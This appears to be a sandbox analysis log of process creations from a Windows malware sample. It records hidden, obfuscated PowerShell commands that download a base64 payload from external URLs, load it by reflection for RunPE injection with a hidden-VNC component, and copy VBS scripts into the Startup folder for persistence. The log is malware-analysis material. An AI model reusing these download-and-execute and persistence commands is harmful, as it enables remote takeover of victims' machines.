Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYb